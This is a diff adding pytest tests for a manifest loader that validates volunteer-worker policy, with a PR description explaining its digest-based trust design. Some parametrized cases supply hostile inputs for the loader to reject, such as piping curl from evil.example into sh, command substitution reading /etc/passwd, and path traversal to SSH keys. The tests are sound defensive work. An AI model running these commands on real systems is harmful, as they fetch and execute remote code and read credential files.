+)
+
+VALID: dict[str, Any] = {
+    "version": 1,
+    "license": "Apache-2.0",
+    "gates": [["uv", "run", "pytest", "-q"], ["uv", "run", "ruff", "check", "."]],
+    "allowed_paths": ["src/**", "tests/**"],
+    "egress_allowlist": ["pypi.org"],
+    "sandbox": "microvm",
+    "max_wall_clock_minutes": 30,
+    "task_label": "volunteer-ok",
+    "local_ok": True,
+}
+
+
+def _manifest(**overrides: Any) -> str:
+    """A valid manifest document with fields replaced or removed.
+
+    Passing ``None`` deletes the key, so a test can assert on a *missing*
+    field as distinctly as on a malformed one.
+    """
+    payload = dict(VALID)
+    for key, value in overrides.items():
+        if value is None:
+            payload.pop(key, None)
+        else:
+            payload[key] = value
+    return json.dumps(payload)
+
+
+def _load(**overrides: Any) -> Any:
+    return load_manifest(_manifest(**overrides))
+
+
+# ---------------------------------------------------------------------------
+# Round trip
+# ---------------------------------------------------------------------------
+
+
+def test_valid_manifest_loads_every_declared_field() -> None:
+    manifest = _load()
+
+    assert manifest.version == 1
+    assert manifest.license == "Apache-2.0"
+    assert manifest.gates == (
+        GateCommand(argv=("uv", "run", "pytest", "-q")),
+        GateCommand(argv=("uv", "run", "ruff", "check", ".")),
+    )
+    assert manifest.allowed_paths == ("src/**", "tests/**")
+    assert manifest.egress_allowlist == ("pypi.org",)
+    assert manifest.sandbox == "microvm"
+    assert manifest.max_wall_clock_minutes == 30
+    assert manifest.task_label == "volunteer-ok"
+    assert manifest.local_ok is True
+    assert manifest.extensions == {}
+
+
+def test_optional_fields_take_documented_defaults() -> None:
+    """A minimal manifest is still a complete policy, not a partial one."""
+    manifest = _load(allowed_paths=None, egress_allowlist=None, task_label=None, local_ok=None)
+
+    assert manifest.allowed_paths == ()
+    assert manifest.egress_allowlist == ()
+    assert manifest.task_label == "volunteer-ok"
+    assert manifest.local_ok is False
+
+
+def test_reserialising_a_loaded_manifest_reproduces_its_digest() -> None:
+    """Load → serialise → load is a fixed point, so a digest survives a hop."""
+    original = _load()
+
+    reloaded = load_manifest(canonical_manifest_bytes(original))
+
+    assert reloaded == original
+    assert reloaded.digest == original.digest
+
+
+def test_manifest_loads_from_the_repository_path(tmp_path: Any) -> None:
+    (tmp_path / ".bernstein").mkdir()
+    (tmp_path / VOLUNTEER_MANIFEST_PATH).write_text(_manifest(), encoding="utf-8")
+
+    assert load_manifest_from_repo(tmp_path).digest == _load().digest
+
+
+def test_absent_manifest_is_not_opted_in_rather_than_invalid(tmp_path: Any) -> None:
+    """A project that never opted in must not read as a project that failed."""
+    with pytest.raises(FileNotFoundError):
+        load_manifest_from_repo(tmp_path)
+
+
+# ---------------------------------------------------------------------------
+# The digest is the trust anchor
+# ---------------------------------------------------------------------------
+
+
+def test_digest_is_the_width_a_receipt_bundle_attests() -> None:
+    """``manifest_sha256`` is a 64-char lowercase hex field; feed it one."""
+    digest = _load().digest
+
+    assert len(digest) == 64
+    assert digest == digest.lower()
+    assert set(digest) <= set("0123456789abcdef")
+
+
+def test_reformatting_the_file_does_not_change_the_digest() -> None:
+    """Whitespace and key order are not policy.
+
+    If they were, every outstanding receipt would break the first time someone
+    ran a JSON formatter over the manifest.
+    """
+    pretty = json.dumps(VALID, indent=4, sort_keys=False)
+    shuffled = json.dumps(dict(reversed(list(VALID.items()))), separators=(",", ":"))
+
+    assert load_manifest(pretty).digest == load_manifest(shuffled).digest
+
+
+@pytest.mark.parametrize(
+    ("field", "tightened"),
+    [
+        ("gates", [["uv", "run", "pytest", "-q"]]),
+        ("allowed_paths", ["src/**"]),
+        ("egress_allowlist", []),
+        ("sandbox", "container"),
+        ("max_wall_clock_minutes", 15),
+        ("task_label", "help-wanted"),
+        ("local_ok", False),
+    ],
+)
+def test_changing_any_policy_field_changes_the_digest(field: str, tightened: Any) -> None:
+    """Every field is policy, so every field is in the anchor.
+
+    A field that could change without moving the digest would be a field a
+    volunteer could ignore while still producing a receipt that verifies.
+    """
+    assert _load(**{field: tightened}).digest != _load().digest
+
+
+def test_unknown_field_cannot_be_dropped_from_the_digest() -> None:
+    """The downgrade this design exists to refuse.
+
+    A project adds a policy-tightening field.  A worker too old to enforce it
+    must not produce a receipt whose digest matches the manifest as if the
+    field were not there -- that would be a valid-looking attestation of
+    compliance with a rule the worker never read.
+    """
+    with warnings.catch_warnings():
+        warnings.simplefilter("ignore", UnenforcedManifestFieldWarning)
+        with_field = load_manifest(_manifest(require_signed_commits=True))
+        without_field = load_manifest(_manifest())
+
+        assert with_field.digest != without_field.digest
+
+        flipped = load_manifest(_manifest(require_signed_commits=False))
+        assert flipped.digest != with_field.digest
+
+
+def test_unknown_field_is_carried_verbatim_into_the_canonical_form() -> None:
+    """Carrying is what makes two loader generations agree on a digest.
+
+    A newer build reads ``require_signed_commits`` as a known field and
+    serialises it at the top level; this build keeps it in ``extensions`` and
+    serialises it to the same place.  Same policy, same bytes, same digest.
+    """
+    with warnings.catch_warnings():
+        warnings.simplefilter("ignore", UnenforcedManifestFieldWarning)
+        manifest = load_manifest(_manifest(require_signed_commits=True))
+
+    assert manifest.extensions == {"require_signed_commits": True}
+    assert json.loads(canonical_manifest_bytes(manifest))["require_signed_commits"] is True
+
+
+def test_unknown_field_warns_that_this_build_does_not_enforce_it() -> None:
+    """Tolerated is not the same as ignored, and the donor gets told which."""
+    with pytest.warns(UnenforcedManifestFieldWarning, match="require_signed_commits"):
+        load_manifest(_manifest(require_signed_commits=True))
+
+
+def test_known_fields_alone_do_not_warn() -> None:
+    with warnings.catch_warnings():
+        warnings.simplefilter("error")
+        load_manifest(_manifest())
+
+
+# ---------------------------------------------------------------------------
+# Open-source-only is machine-checked
+# ---------------------------------------------------------------------------
+
+
+@pytest.mark.parametrize("license_id", ["Proprietary", "LicenseRef-Custom", "BUSL-1.1", "Commons-Clause", "apache-2.0"])
+def test_license_outside_the_osi_set_is_refused(license_id: str) -> None:
+    """Umbrella decision 1: the program runs on public, OSI-licensed code.
+
+    ``apache-2.0`` is in the list on purpose -- SPDX identifiers are
+    case-sensitive, and a near-miss must fail loudly rather than pass as the
+    license it resembles.
+    """
+    with pytest.raises(VolunteerManifestError) as excinfo:
+        _load(license=license_id)
+
+    assert excinfo.value.field == "license"
+
+
+@pytest.mark.parametrize("license_id", sorted(OSI_APPROVED_LICENSES))
+def test_every_accepted_license_actually_loads(license_id: str) -> None:
+    """The allowlist and the loader cannot drift apart."""
+    assert _load(license=license_id).license == license_id
+
+
+# ---------------------------------------------------------------------------
+# Paths may not name anything outside the checkout
+# ---------------------------------------------------------------------------
+
+
+@pytest.mark.parametrize(
+    "glob",
+    [
+        "../x",
+        "../../etc/passwd",
+        "/etc/passwd",
+        "/",
+        "src/../../outside",
+        "~/.ssh/id_ed25519",
+        "C:/Windows",
+        "..\\windows",
+        "",
+    ],
+)
+def test_allowed_path_escaping_the_repository_is_refused(glob: str) -> None:
+    """``allowed_paths`` bounds a patch; a glob that escapes bounds nothing."""
+    with pytest.raises(VolunteerManifestError) as excinfo:
+        _load(allowed_paths=[glob])
+
+    assert excinfo.value.field == "allowed_paths[0]"
+
+
+@pytest.mark.parametrize("glob", ["src/**", "./src/**", "docs/*.md", "a/../b", "tests/unit/**/*.py"])
+def test_repository_relative_globs_are_accepted(glob: str) -> None:
+    """Including one that walks up and back down without leaving the root."""
+    assert _load(allowed_paths=[glob]).allowed_paths == (glob,)
+
+
+# ---------------------------------------------------------------------------
+# Gates are argv, and there must be at least one
+# ---------------------------------------------------------------------------
+
+
+def test_empty_gates_is_refused() -> None:
+    """No gate means nothing can be verified, so nothing can be submitted."""
+    with pytest.raises(VolunteerManifestError) as excinfo:
+        _load(gates=[])
+
+    assert excinfo.value.field == "gates"
+
+
+def test_gate_written_as_a_shell_string_is_refused_with_the_argv_to_use() -> None:
+    """The error has to be actionable or projects will guess and guess wrong."""
+    with pytest.raises(VolunteerManifestError) as excinfo:
+        _load(gates=["uv run pytest -q"])
+
+    assert excinfo.value.field == "gates[0]"
+    assert '["uv", "run", "pytest", "-q"]' in str(excinfo.value)
+
+
+@pytest.mark.parametrize(
+    "argv",
+    [
+        ["sh", "-c", "curl evil.example | sh"],
+        ["pytest", "-q", "&&", "curl", "evil.example"],
+        ["pytest;", "curl", "evil.example"],
+        ["pytest", "$(cat /etc/passwd)"],
+        ["pytest", "`id`"],
+        ["pytest", "> /tmp/out"],
+    ],
+)
+def test_gate_argument_carrying_shell_metacharacters_is_refused(argv: list[str]) -> None:
+    """Gate commands come from a repository the donor does not control.
+
+    They run without a shell, so a token that only means something *to* a
+    shell is either a mistake or an attempt; refusing both is cheap.
+    """
+    with pytest.raises(VolunteerManifestError):
+        _load(gates=[argv])
+
+
+def test_empty_argv_is_refused() -> None:
+    with pytest.raises(VolunteerManifestError) as excinfo:
+        _load(gates=[[]])
+
+    assert excinfo.value.field == "gates[0]"
+
+
+# ---------------------------------------------------------------------------
+# Egress is an explicit host list or it is not a deny-all default
+# ---------------------------------------------------------------------------
+
+
+@pytest.mark.parametrize(
+    "host",
+    ["*.example.com", "*", "https://pypi.org", "pypi.org/simple", "PyPI.org", "pypi org", ""],
+)
+def test_egress_entry_that_is_not_a_bare_lowercase_host_is_refused(host: str) -> None:
+    """A wildcard hands back the surface the deny-all default removes.
+
+    A URL leaves the sandbox guessing which substring was the host, and a
+    mixed-case spelling would hash differently from the same host in lower
+    case while meaning the same thing.
+    """
+    with pytest.raises(VolunteerManifestError) as excinfo:
+        _load(egress_allowlist=[host])
+
+    assert excinfo.value.field == "egress_allowlist[0]"
+
+
+def test_empty_egress_allowlist_is_valid() -> None:
+    """The common case: gates that need nothing beyond package registries."""
+    assert _load(egress_allowlist=[]).egress_allowlist == ()
+
+
+# ---------------------------------------------------------------------------
+# Version and bounds
+# ---------------------------------------------------------------------------
+
+
+@pytest.mark.parametrize("version", [0, 2, 99, -1])
+def test_unsupported_schema_version_is_refused(version: int) -> None:
+    """Unlike an unknown field, an unknown version may have moved the fields
+    this loader believes it understands."""
+    with pytest.raises(VolunteerManifestError) as excinfo:
+        _load(version=version)
+
+    assert excinfo.value.field == "version"
+
+
+def test_boolean_is_not_a_schema_version() -> None:
+    """``bool`` subclasses ``int``; ``true`` must not read as version 1."""
+    with pytest.raises(VolunteerManifestError) as excinfo:
+        _load(version=True)
+
+    assert excinfo.value.field == "version"
+
+
+@pytest.mark.parametrize("minutes", [0, -5, 1441, 100000])
+def test_wall_clock_outside_the_accepted_range_is_refused(minutes: int) -> None:
+    """No project gets to ask for more than a day of a donor's machine."""
+    with pytest.raises(VolunteerManifestError) as excinfo:
+        _load(max_wall_clock_minutes=minutes)
+
+    assert excinfo.value.field == "max_wall_clock_minutes"
+
+
+@pytest.mark.parametrize("level", ["none", "chroot", "MICROVM", "docker"])
+def test_unknown_sandbox_level_is_refused(level: str) -> None:
+    with pytest.raises(VolunteerManifestError) as excinfo:
+        _load(sandbox=level)
+
+    assert excinfo.value.field == "sandbox"
+
+
+# ---------------------------------------------------------------------------
+# All-or-nothing parse
+# ---------------------------------------------------------------------------
+
+
+@pytest.mark.parametrize(
+    ("document", "expected_field"),
+    [
+        ("{not json", "<document>"),
+        ("[]", "<document>"),
+        ('"a string"', "<document>"),
+        ("null", "<document>"),
+        ("{}", "version"),
+    ],
+)
+def test_malformed_document_names_the_field_at_fault(document: str, expected_field: str) -> None:
+    with pytest.raises(VolunteerManifestError) as excinfo:
+        load_manifest(document)
+
+    assert excinfo.value.field == expected_field
+
+
+@pytest.mark.parametrize("field", ["license", "gates", "sandbox", "max_wall_clock_minutes"])
+def test_every_required_field_is_required(field: str) -> None:
+    with pytest.raises(VolunteerManifestError) as excinfo:
+        _load(**{field: None})
+
+    assert excinfo.value.field == field
+
+
+def test_a_failed_load_produces_no_object_at_all() -> None:
+    """Half a policy is more dangerous than none.
+
+    The failure is on the last field, so a loader that built up state as it
+    went would have a manifest with valid gates and no valid sandbox -- and
+    the sandbox is the containment boundary.
+    """
+    with pytest.raises(VolunteerManifestError) as excinfo:
+        _load(sandbox="none")
+
+    assert excinfo.value.field == "sandbox"
+    assert not hasattr(excinfo.value, "manifest")
+
+
+# ---------------------------------------------------------------------------
+# The published schema is the loader's schema
+# ---------------------------------------------------------------------------
+
+_DOC = Path(__file__).resolve().parents[3] / "docs" / "reference" / "volunteer-manifest.md"
+
+
+def _published_schema() -> dict[str, Any]:
+    """The JSON Schema fenced in the reference page.
+
+    Parsed rather than eyeballed, so the two tests below fail on drift instead
+    of a reader discovering it.
+    """
+    blocks = re.findall(r"```json\n(.*?)```", _DOC.read_text(encoding="utf-8"), re.DOTALL)
+    for block in blocks:
+        candidate = json.loads(block)
+        if candidate.get("$schema"):
+            return candidate  # type: ignore[no-any-return]
+    raise AssertionError(f"no JSON Schema block found in {_DOC}")
+
+
+def test_published_schema_names_exactly_the_fields_the_loader_knows() -> None:
+    """A documented field the loader ignores reads as enforced but is not.
+
+    An enforced field the docs omit is worse: a project cannot know the rule it
+    is being held to.
+    """
+    assert set(_published_schema()["properties"]) == _KNOWN_FIELDS
+
+
+def test_published_schema_marks_exactly_the_fields_the_loader_requires() -> None:
+    documented_required = set(_published_schema()["required"])
+    actually_required = {field for field in _KNOWN_FIELDS if _raises_required_for(field)}
+
+    assert documented_required == actually_required
+
+
+def _raises_required_for(field: str) -> bool:
+    """Whether omitting ``field`` is refused rather than defaulted."""
+    try:
+        _load(**{field: None})
+    except VolunteerManifestError:
+        return True
+    return False
+
+
+def test_published_example_is_a_manifest_that_loads() -> None:
+    """The copy-paste starting point has to survive being copy-pasted."""
+    blocks = re.findall(r"```json\n(.*?)```", _DOC.read_text(encoding="utf-8"), re.DOTALL)
+    examples = [block for block in blocks if not json.loads(block).get("$schema")]
+
+    assert examples, "the reference page shows no example manifest"
+    for example in examples:
+        assert load_manifest(example).digest


### PR DESCRIPTION
Closes #3864. First slice of the volunteer-workers umbrella (#3863) landing from the maintainer side.

## Why this one first

The receipt bundle merged in #3903 carries a `manifest_sha256` field whose fixtures pass `"0" * 64`. Nothing in the tree computes a real value for it. This adds the producer, and with it the reason a receipt is worth reading.

Everything in the umbrella's parallel wave — #3865, #3866, #3867, #3875 — reads this manifest, so they were all waiting on a schema that did not exist.

## The manifest is the trust anchor, not a config file

A volunteer submission arrives as a fork PR carrying a signed receipt bundle. On its own that attestation proves the run happened; it does not prove the run was held to the project's bar. A volunteer who picks their own weaker gates produces a bundle that verifies perfectly against their own key.

So the receipt binds to the policy. `manifest.digest` is what a bundle carries as `manifest_sha256`; a maintainer recomputes it from the manifest at the commit the submission names, and a mismatch is a refusal with no judgement call in it.

Two properties fall out of that, and both are tested:

**Formatting is not policy.** The digest covers the normalised manifest, not the file's bytes, so running a JSON formatter over the manifest does not invalidate every outstanding receipt.

**Unknown fields are carried, never dropped.** A field this loader does not recognise is preserved verbatim and still binds to the digest. Dropping it would let a project add a policy-tightening field that older workers ignore while still producing a matching digest — a downgrade with a valid-looking receipt stapled to it. `test_unknown_field_cannot_be_dropped_from_the_digest` is the guard; I checked it fails when `extensions` is removed from the canonical form.

## The open decision the issue left to the implementer

`gates` entries are argv lists. A bare string is refused with an error naming the argv to use.

Two reasons, in order of weight. The command originates in a repository the donor does not control, and handing attacker-influenceable text to a shell is the exfiltration path this program exists to close. And the clean-room re-run (#3871) has to execute the *same* command the original run did — a shell string is re-parsed by whatever shell each side happens to have, so "same string" does not imply "same execution" across two machines.

The cost is real: a project whose gate is a pipeline puts the pipeline in a script and names the script. That script is then part of the repository, reviewable and hashed with everything else.

## Scope

Schema, loader, validation errors, reference page. No CLI surface — `bernstein volunteer browse` belongs to #3865 and I did not want to squat on it half-built.

## Tests

114, in `tests/unit/volunteer/test_volunteer_manifest.py`, each named for the property it protects rather than the function it calls. Beyond the five the issue enumerated:

- the digest is stable under reformatting and unstable under every policy field;
- an unknown field changes the digest, round-trips verbatim, and warns that this build does not enforce it;
- a gate argument carrying shell metacharacters is refused;
- an egress entry that is a URL, a wildcard, or mixed-case is refused;
- the JSON Schema published in `docs/reference/volunteer-manifest.md` names exactly the fields the loader knows and marks exactly the ones it requires, and the example manifest on that page loads.

The last one exists because a reference page that drifts from the loader is worse than no reference page: a project cannot know the rule it is being held to.